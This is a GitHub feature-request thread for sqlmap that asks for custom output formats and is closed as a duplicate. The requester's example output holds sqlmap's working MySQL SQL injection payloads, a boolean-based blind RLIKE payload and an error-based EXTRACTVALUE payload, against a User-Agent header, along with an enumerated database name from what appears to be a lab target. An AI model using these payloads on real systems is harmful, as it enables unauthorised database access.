### ISSUE TITLE
Add custom output in different formats

### ISSUE THREAD

**Issue by machinexa2** [sqlmapproject/sqlmap#4361] opened 2020-09-28 16:25 UTC
**Is your feature request related to a problem? Please describe.**
No
I'm always frustrated when sqlmap logs output in /root/.sqlmap or /root/.local but i want custom output format in file of my choice like simple output to /tmp/log. -oS simple, -oJ json, -oC csv and so on. Atleast one output format should be there.
**Describe the solution you'd like**
I want 2 output formats at min. One is Simple. That should be similar to this
```
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: inject' RLIKE (SELECT (CASE WHEN (4143=4143) THEN 0x696e6a656374 ELSE 0x28 END)) AND 'TvWO'='TvWO

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: inject' AND EXTRACTVALUE(6371,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(6371=6371,1))),0x716a6b6a71)) AND 'eNcm'='eNcm
---
web application technology: PHP 7.2.33
back-end DBMS: MySQL >= 5.1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: inject' RLIKE (SELECT (CASE WHEN (4143=4143) THEN 0x696e6a656374 ELSE 0x28 END)) AND 'TvWO'='TvWO

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: inject' AND EXTRACTVALUE(6371,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(6371=6371,1))),0x716a6b6a71)) AND 'eNcm'='eNcm
---
back-end DBMS: MySQL >= 5.1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: inject' RLIKE (SELECT (CASE WHEN (4143=4143) THEN 0x696e6a656374 ELSE 0x28 END)) AND 'TvWO'='TvWO

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: inject' AND EXTRACTVALUE(6371,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(6371=6371,1))),0x716a6b6a71)) AND 'eNcm'='eNcm
---
back-end DBMS: MySQL >= 5.1
current database: 'ag3nt_u_1s_v3ry_t3l3nt3d'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: inject' RLIKE (SELECT (CASE WHEN (4143=4143) THEN 0x696e6a656374 ELSE 0x28 END)) AND 'TvWO'='TvWO

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: inject' AND EXTRACTVALUE(6371,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(6371=6371,1))),0x716a6b6a71)) AND 'eNcm'='eNcm
---
back-end DBMS: MySQL >= 5.1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: inject' RLIKE (SELECT (CASE WHEN (4143=4143) THEN 0x696e6a656374 ELSE 0x28 END)) AND 'TvWO'='TvWO

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: inject' AND EXTRACTVALUE(6371,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(6371=6371,1))),0x716a6b6a71)) AND 'eNcm'='eNcm
---
web application technology: PHP 7.2.33
back-end DBMS: MySQL >= 5.1
current database: 'ag3nt_u_1s_v3ry_t3l3nt3d'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: inject' RLIKE (SELECT (CASE WHEN (4143=4143) THEN 0x696e6a656374 ELSE 0x28 END)) AND 'TvWO'='TvWO

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: inject' AND EXTRACTVALUE(6371,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(6371=6371,1))),0x716a6b6a71)) AND 'eNcm'='eNcm
---
back-end DBMS: MySQL >= 5.1
available databases [1]:
[*] ag3nt_u_1s_v3ry_t3l3nt3d
```
Now for json think yourself
**Additional context**
No, nothing

**Comment by stamparm** [comment] 2020-10-05 10:47
Duplicate of #14

**Closed by stamparm** 2020-10-05 10:47 UTC
Labels: feature request
